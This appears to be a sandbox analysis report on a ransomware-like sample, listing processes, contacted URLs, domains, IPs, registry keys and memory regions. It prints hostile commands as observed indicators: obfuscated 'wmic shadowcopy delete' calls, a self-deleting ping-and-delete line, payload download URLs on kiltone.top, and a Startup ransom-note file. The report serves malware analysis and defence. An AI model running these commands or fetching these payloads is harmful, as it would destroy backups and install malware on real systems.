c:\jExFKd\jExF\..\..\Windows\jExF\jExF\..\..\system32\jExF\jExF\..\..\wbem\jExF\jExFK\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\qYxiJv\qYxi\..\..\Windows\qYxi\qYxi\..\..\system32\qYxi\qYxi\..\..\wbem\qYxi\qYxiJ\..\..\wmic.exe shadowcopy delete
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
"C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\DgeFGH\DgeF\..\..\Windows\DgeF\DgeF\..\..\system32\DgeF\DgeF\..\..\wbem\DgeF\DgeFG\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\xMvAnp\xMvA\..\..\Windows\xMvA\xMvA\..\..\system32\xMvA\xMvA\..\..\wbem\xMvA\xMvAn\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\mCMXKV\mCMX\..\..\Windows\mCMX\mCMX\..\..\system32\mCMX\mCMX\..\..\wbem\mCMX\mCMXK\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\wbem\WMIC.exe
|
c:\mZDBzN\mZDB\..\..\Windows\mZDB\mZDB\..\..\system32\mZDB\mZDB\..\..\wbem\mZDB\mZDBz\..\..\wmic.exe shadowcopy delete
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 1.1.1.1 -n 1 -w 3000
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\control.exe
|
control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\notepad.exe
|
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 40 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://kiltone.top/ste
|
unknown
|
||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
|||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl
|
45.125.67.168
|
||
https://kiltone.top/stelin/rwcla.cpl
|
45.125.67.168
|
||
https://www.oldmutual.co.za/v3/assets/blt0
|
unknown
|
||
https://kiltone.top/stelin/rwcla.
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://digify.com/a/#/access/login
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
https://weibo.com/
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://www.oldmutual.co.za/favicon.ico
|
18.161.69.16
|
||
https://www.reddit.com/
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|
|||
https://github.com/mozilla/webcompat-reporter
|
unknown
|
||
https://www.amazon.co.uk/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
https://screenshots.firefox.com/
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://www.google.com/search?client=firefox-b-d&q=
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
https://www.wykop.pl/
|
unknown
|
||
https://twitter.com/
|
unknown
|
||
https://digify.com/a/#/access/logincmd
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.olx.pl/
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://support.mozilla.org/products/firefox
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
https://www.amazon.fr/
|
unknown
|
||
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
https://www.google.com/complete/
|
unknown
|
||
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
|
unknown
|
||
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
|
unknown
|
||
https://support.mozilla.org
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://www.amazon.de/
|
unknown
|
||
https://www.baidu.com/
|
unknown
|
There are 48 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
d12y248af9ueom.cloudfront.net
|
18.161.69.16
|
||
www.google.com
|
172.217.19.228
|
||
kiltone.top
|
45.125.67.168
|
||
www.oldmutual.co.za
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.217.19.228
|
www.google.com
|
United States
|
||
45.125.67.168
|
kiltone.top
|
Hong Kong
|
||
192.168.2.7
|
unknown
|
unknown
|
||
18.161.69.16
|
d12y248af9ueom.cloudfront.net
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
XPSUDTARW
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
UID
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Public
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Private
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWindowsOnlyEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fPasteOriginalEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fReverse
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWrapAround
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fMatchCase
|
There are 30 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1998EC60000
|
trusted library allocation
|
page read and write
|
||
C9B909A000
|
stack
|
page read and write
|
||
1998ED19000
|
heap
|
page read and write
|
||
2021BBAB000
|
heap
|
page read and write
|
||
7AC82FE000
|
stack
|
page read and write
|
||
BF1000
|
unkown
|
page execute read
|
||
2641853A000
|
heap
|
page read and write
|
||
7FFB226C6000
|
unkown
|
page readonly
|
||
128FDFE000
|
unkown
|
page readonly
|
||
22844426000
|
heap
|
page read and write
|
||
2021BB4A000
|
heap
|
page read and write
|
||
11E73580000
|
heap
|
page read and write
|
||
264186D0000
|
trusted library allocation
|
page read and write
|
||
11E71B85000
|
heap
|
page read and write
|
||
123D66F0000
|
heap
|
page read and write
|
||
11E73600000
|
heap
|
page read and write
|
||
11E71B7E000
|
heap
|
page read and write
|
||
1998F434000
|
heap
|
page read and write
|
||
142868A0000
|
heap
|
page read and write
|
||
2284CAC0000
|
heap
|
page read and write
|
||
228445C0000
|
trusted library allocation
|
page read and write
|
||
7987AFE000
|
stack
|
page read and write
|
||
7FFB27C61000
|
unkown
|
page execute read
|
||
1428BDD2000
|
trusted library allocation
|
page read and write
|
||
2740CC95000
|
heap
|
page read and write
|
||
7FFB16790000
|
unkown
|
page readonly
|
||
A970000
|
heap
|
page read and write
|
||
27A55A05000
|
heap
|
page read and write
|
||
142868FF000
|
heap
|
page read and write
|
||
1428C055000
|
heap
|
page read and write
|
||
1998F437000
|
heap
|
page read and write
|
||
128F7FE000
|
unkown
|
page readonly
|
||
123D6DF8000
|
heap
|
page read and write
|
||
2740CCAE000
|
heap
|
page read and write
|
||
1428BDD0000
|
trusted library allocation
|
page read and write
|
||
14286840000
|
heap
|
page read and write
|
||
22844B37000
|
heap
|
page read and write
|
||
27A5581D000
|
heap
|
page read and write
|
||
123D68B0000
|
heap
|
page read and write
|
||
B37E000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
CAE000
|
unkown
|
page readonly
|
||
11E73665000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
26418555000
|
heap
|
page read and write
|
||
AAB4000
|
heap
|
page read and write
|
||
A960000
|
trusted library allocation
|
page read and write
|
||
7FFB167B0000
|
unkown
|
page read and write
|
||
123D6650000
|
heap
|
page read and write
|
||
2740CC94000
|
heap
|
page read and write
|
||
2740CC92000
|
heap
|
page read and write
|
||
11E71BA3000
|
heap
|
page read and write
|
||
BEC6000
|
heap
|
page read and write
|
||
2740CCD8000
|
heap
|
page read and write
|
||
2740CDA0000
|
trusted library allocation
|
page read and write
|
||
2284466A000
|
heap
|
page read and write
|
||
123D6570000
|
heap
|
page read and write
|
||
8CE067F000
|
stack
|
page read and write
|
||
7FFB226B1000
|
unkown
|
page execute read
|
||
11E71B76000
|
heap
|
page read and write
|
||
2284CC4A000
|
heap
|
page read and write
|
||
B47000
|
heap
|
page read and write
|
||
26418C5A000
|
heap
|
page read and write
|
||
79AB47F000
|
stack
|
page read and write
|
||
B379000
|
heap
|
page read and write
|
||
14286895000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
1998ED2F000
|
heap
|
page read and write
|
||
28C3000
|
heap
|
page read and write
|
||
A871000
|
heap
|
page read and write
|
||
7FFB27C61000
|
unkown
|
page execute read
|
||
123D6707000
|
heap
|
page read and write
|
||
2740D277000
|
heap
|
page read and write
|
||
26418C54000
|
heap
|
page read and write
|
||
1428C059000
|
heap
|
page read and write
|
||
798710A000
|
stack
|
page read and write
|
||
14286AF0000
|
heap
|
page read and write
|
||
7FFB226D5000
|
unkown
|
page readonly
|
||
2021BB6E000
|
heap
|
page read and write
|
||
CAE000
|
unkown
|
page readonly
|
||
2284CC45000
|
heap
|
page read and write
|
||
2284CA60000
|
heap
|
page read and write
|
||
BD80000
|
trusted library allocation
|
page read and write
|
||
142867F0000
|
heap
|
page read and write
|
||
2284CC40000
|
heap
|
page read and write
|
||
D3D48FF000
|
stack
|
page read and write
|
||
CA6000
|
unkown
|
page write copy
|
||
11E71BD7000
|
heap
|
page read and write
|
||
2021BDA5000
|
heap
|
page read and write
|
||
28C6000
|
heap
|
page read and write
|
||
128F6FE000
|
stack
|
page read and write
|
||
C8C9000
|
heap
|
page read and write
|
||
B371000
|
heap
|
page read and write
|
||
2284CA80000
|
trusted library allocation
|
page read and write
|
||
20100FF000
|
stack
|
page read and write
|
||
7FFB226C6000
|
unkown
|
page readonly
|
||
1998ECE7000
|
heap
|
page read and write
|
||
1428BE00000
|
trusted library allocation
|
page read and write
|
||
2469276B000
|
heap
|
page read and write
|
||
A871000
|
heap
|
page read and write
|
||
14287980000
|
trusted library section
|
page readonly
|
||
11E71BCA000
|
heap
|
page read and write
|
||
26418555000
|
heap
|
page read and write
|
||
BE78D07000
|
stack
|
page read and write
|
||
123D6DF7000
|
heap
|
page read and write
|
||
C9B957F000
|
stack
|
page read and write
|
||
AAB4000
|
heap
|
page read and write
|
||
11E71B7E000
|
heap
|
page read and write
|
||
14287640000
|
trusted library allocation
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
128F9FE000
|
unkown
|
page readonly
|
||
1428C062000
|
heap
|
page read and write
|
||
27A557B1000
|
heap
|
page read and write
|
||
B6A5000
|
heap
|
page read and write
|
||
26418C57000
|
heap
|
page read and write
|
||
1428BEA0000
|
trusted library allocation
|
page read and write
|
||
2740D278000
|
heap
|
page read and write
|
||
14286A10000
|
heap
|
page read and write
|
||
345B000
|
heap
|
page read and write
|
||
1428BD50000
|
trusted library allocation
|
page read and write
|
||
1998ECF9000
|
heap
|
page read and write
|
||
2740CCDA000
|
heap
|
page read and write
|
||
8CE019A000
|
stack
|
page read and write
|
||
27A556F0000
|
heap
|
page read and write
|
||
2740CC70000
|
trusted library allocation
|
page read and write
|
||
2740CC9E000
|
heap
|
page read and write
|
||
1428BE14000
|
trusted library allocation
|
page read and write
|
||
2021BB17000
|
heap
|
page read and write
|
||
CAE000
|
unkown
|
page readonly
|
||
425D7F000
|
stack
|
page read and write
|
||
2284CC4A000
|
heap
|
page read and write
|
||
A431000
|
heap
|
page read and write
|
||
1998ED31000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
2284C960000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
2284CC4E000
|
heap
|
page read and write
|
||
123D6E04000
|
heap
|
page read and write
|
||
3220000
|
heap
|
page read and write
|
||
1428BDC0000
|
trusted library allocation
|
page read and write
|
||
22844427000
|
heap
|
page read and write
|
||
128F8FB000
|
stack
|
page read and write
|
||
228443C0000
|
trusted library allocation
|
page read and write
|
||
1428BE10000
|
trusted library allocation
|
page read and write
|
||
24AD000
|
stack
|
page read and write
|
||
2284CC4E000
|
heap
|
page read and write
|
||
2740CC9E000
|
heap
|
page read and write
|
||
1998ED35000
|
heap
|
page read and write
|
||
2021BB18000
|
heap
|
page read and write
|
||
8FF000
|
heap
|
page read and write
|
||
7FFB226B1000
|
unkown
|
page execute read
|
||
1428C10C000
|
heap
|
page read and write
|
||
BF1000
|
unkown
|
page execute read
|
||
7FFB226B1000
|
unkown
|
page execute read
|
||
79AB2FF000
|
stack
|
page read and write
|
||
ACAE000
|
heap
|
page read and write
|
||
359C000
|
heap
|
page read and write
|
||
1428688E000
|
heap
|
page read and write
|
||
1998F447000
|
heap
|
page read and write
|
||
123D6965000
|
heap
|
page read and write
|
||
425918000
|
stack
|
page read and write
|
||
14286878000
|
heap
|
page read and write
|
||
26418500000
|
heap
|
page read and write
|
||
2021BAE0000
|
heap
|
page read and write
|
||
C0B6000
|
heap
|
page read and write
|
||
123D6729000
|
heap
|
page read and write
|
||
7FFB226D0000
|
unkown
|
page read and write
|
||
1428C0EE000
|
heap
|
page read and write
|
||
26418C5B000
|
heap
|
page read and write
|
||
123D6E02000
|
heap
|
page read and write
|
||
2284CB14000
|
heap
|
page read and write
|
||
2740CCF1000
|
heap
|
page read and write
|
||
ACA5000
|
heap
|
page read and write
|
||
2C20000
|
heap
|
page read and write
|
||
1428C105000
|
heap
|
page read and write
|
||
7FFB226B1000
|
unkown
|
page execute read
|
||
11E75DB0000
|
heap
|
page read and write
|
||
26418547000
|
heap
|
page read and write
|
||
11E73603000
|
heap
|
page read and write
|
||
BF0000
|
unkown
|
page readonly
|
||
1428C110000
|
heap
|
page read and write
|
||
1428C0BE000
|
heap
|
page read and write
|
||
8CE057F000
|
stack
|
page read and write
|
||
2021BB32000
|
heap
|
page read and write
|
||
1998ED33000
|
heap
|
page read and write
|
||
11E71BD9000
|
heap
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
2284CAD7000
|
heap
|
page read and write
|
||
11E73660000
|
heap
|
page read and write
|
||
22844426000
|
heap
|
page read and write
|
||
2740CCF1000
|
heap
|
page read and write
|
||
11E73560000
|
trusted library allocation
|
page read and write
|
||
128FCFB000
|
stack
|
page read and write
|
||
2284D1A2000
|
heap
|
page read and write
|
||
3470000
|
heap
|
page read and write
|
||
200FD8E000
|
stack
|
page read and write
|
||
2740D250000
|
heap
|
page read and write
|
||
BF0000
|
unkown
|
page readonly
|
||
2740CCDC000
|
heap
|
page read and write
|
||
C0B0000
|
trusted library allocation
|
page read and write
|
||
128F5FE000
|
unkown
|
page readonly
|
||
129107E000
|
stack
|
page read and write
|
||
12908FE000
|
unkown
|
page readonly
|
||
11E71B86000
|
heap
|
page read and write
|
||
22844664000
|
heap
|
page read and write
|
||
1998F43E000
|
heap
|
page read and write
|
||
128FEFE000
|
unkown
|
page readonly
|
||
1428BF20000
|
trusted library allocation
|
page read and write
|
||
246942C0000
|
heap
|
page read and write
|
||
22844426000
|
heap
|
page read and write
|
||
123D6741000
|
heap
|
page read and write
|
||
7FFB226B0000
|
unkown
|
page readonly
|
||
24692985000
|
heap
|
page read and write
|
||
2284D1A2000
|
heap
|
page read and write
|
||
26418C53000
|
heap
|
page read and write
|
||
128EF3B000
|
stack
|
page read and write
|
||
2D00000
|
heap
|
page read and write
|
||
ACAC000
|
heap
|
page read and write
|
||
1998EC60000
|
trusted library allocation
|
page read and write
|
||
3570000
|
heap
|
page read and write
|
||
2740CCB2000
|
heap
|
page read and write
|
||
2740CF00000
|
heap
|
page read and write
|
||
12907F9000
|
stack
|
page read and write
|
||
BE7917E000
|
stack
|
page read and write
|
||
228443C0000
|
trusted library allocation
|
page read and write
|
||
1428C042000
|
heap
|
page read and write
|
||
A97A000
|
heap
|
page read and write
|
||
1428C117000
|
heap
|
page read and write
|
||
2284D1A4000
|
heap
|
page read and write
|
||
A861000
|
heap
|
page read and write
|
||
264186F0000
|
heap
|
page read and write
|
||
2641855E000
|
heap
|
page read and write
|
||
142868B4000
|
heap
|
page read and write
|
||
11E71BF6000
|
heap
|
page read and write
|
||
B4B5000
|
heap
|
page read and write
|
||
8CE047E000
|
stack
|
page read and write
|
||
11E7366C000
|
heap
|
page read and write
|
||
1428682B000
|
heap
|
page read and write
|
||
C7B000
|
unkown
|
page readonly
|
||
1998F44C000
|
heap
|
page read and write
|
||
ACA0000
|
heap
|
page read and write
|
||
902000
|
heap
|
page read and write
|
||
1428710C000
|
heap
|
page read and write
|
||
11E755B0000
|
trusted library allocation
|
page read and write
|
||
2284CC4B000
|
heap
|
page read and write
|
||
26418C6C000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
69C000
|
stack
|
page read and write
|
||
22844667000
|
heap
|
page read and write
|
||
7FFB226B0000
|
unkown
|
page readonly
|
||
14287113000
|
heap
|
page read and write
|
||
2284D190000
|
heap
|
page read and write
|
||
2284440B000
|
heap
|
page read and write
|
||
1428C01F000
|
heap
|
page read and write
|
||
AAB8000
|
heap
|
page read and write
|
||
1998EC40000
|
heap
|
page read and write
|
||
B6AA000
|
heap
|
page read and write
|
||
8CE04FE000
|
stack
|
page read and write
|
||
2284CD00000
|
heap
|
page read and write
|
||
2740CCE1000
|
heap
|
page read and write
|
||
1428C0FA000
|
heap
|
page read and write
|
||
123D6737000
|
heap
|
page read and write
|
||
129017E000
|
stack
|
page read and write
|
||
A671000
|
heap
|
page read and write
|
||
7FFB226D2000
|
unkown
|
page readonly
|
||
ACA9000
|
heap
|
page read and write
|
||
14287301000
|
trusted library allocation
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
2740CC9A000
|
heap
|
page read and write
|
||
4430000
|
heap
|
page read and write
|
||
425CFE000
|
stack
|
page read and write
|
||
2021BB6E000
|
heap
|
page read and write
|
||
26418C72000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
2284CB15000
|
heap
|
page read and write
|
||
26418514000
|
heap
|
page read and write
|
||
264184F0000
|
trusted library allocation
|
page read and write
|
||
2021BB11000
|
heap
|
page read and write
|
||
1428BF70000
|
remote allocation
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
2740CC97000
|
heap
|
page read and write
|
||
123D6690000
|
trusted library allocation
|
page read and write
|
||
1998ED31000
|
heap
|
page read and write
|
||
129057E000
|
stack
|
page read and write
|
||
22844665000
|
heap
|
page read and write
|
||
7FFB226D0000
|
unkown
|
page read and write
|
||
79878FF000
|
stack
|
page read and write
|
||
1998ED19000
|
heap
|
page read and write
|
||
26418740000
|
heap
|
page read and write
|
||
7FFB27C80000
|
unkown
|
page read and write
|
||
33B0000
|
heap
|
page read and write
|
||
C9B94FF000
|
stack
|
page read and write
|
||
25AD000
|
stack
|
page read and write
|
||
7FFB226D2000
|
unkown
|
page readonly
|
||
B376000
|
heap
|
page read and write
|
||
BF0000
|
unkown
|
page readonly
|
||
2740CCB7000
|
heap
|
page read and write
|
||
11E71B48000
|
heap
|
page read and write
|
||
2021BBE0000
|
heap
|
page read and write
|
||
128F4F7000
|
stack
|
page read and write
|
||
29A0000
|
heap
|
page read and write
|
||
2284CA80000
|
trusted library allocation
|
page read and write
|
||
2740CC9A000
|
heap
|
page read and write
|
||
2740D282000
|
heap
|
page read and write
|
||
228445E0000
|
heap
|
page read and write
|
||
1998ECF9000
|
heap
|
page read and write
|
||
C9B947F000
|
stack
|
page read and write
|
||
B6AC000
|
heap
|
page read and write
|
||
26418C5E000
|
heap
|
page read and write
|
||
1998ED1A000
|
heap
|
page read and write
|
||
BE7907E000
|
stack
|
page read and write
|
||
1428C0DD000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
22844B38000
|
heap
|
page read and write
|
||
123D6736000
|
heap
|
page read and write
|
||
7987CFF000
|
stack
|
page read and write
|
||
123D68BA000
|
heap
|
page read and write
|
||
27A55A00000
|
heap
|
page read and write
|
||
79AB27A000
|
stack
|
page read and write
|
||
246926D0000
|
heap
|
page read and write
|
||
2021BB2D000
|
heap
|
page read and write
|
||
1428C114000
|
heap
|
page read and write
|
||
12910FE000
|
unkown
|
page readonly
|
||
2021BAF2000
|
heap
|
page read and write
|
||
11E71BC1000
|
heap
|
page read and write
|
||
A8BC000
|
heap
|
page read and write
|
||
1428BDD4000
|
trusted library allocation
|
page read and write
|
||
2284CA40000
|
heap
|
page read and write
|
||
123D66F9000
|
heap
|
page read and write
|
||
2284CC47000
|
heap
|
page read and write
|
||
2740CC90000
|
heap
|
page read and write
|
||
A976000
|
heap
|
page read and write
|
||
1428BDD1000
|
trusted library allocation
|
page read and write
|
||
2021BB0A000
|
heap
|
page read and write
|
||
1998F435000
|
heap
|
page read and write
|
||
C8C6000
|
heap
|
page read and write
|
||
2284CAFB000
|
heap
|
page read and write
|
||
1428BF00000
|
trusted library allocation
|
page read and write
|
||
26418745000
|
heap
|
page read and write
|
||
128FAFB000
|
stack
|
page read and write
|
||
7EA000
|
heap
|
page read and write
|
||
B6AE000
|
heap
|
page read and write
|
||
228443D0000
|
heap
|
page read and write
|
||
2641853D000
|
heap
|
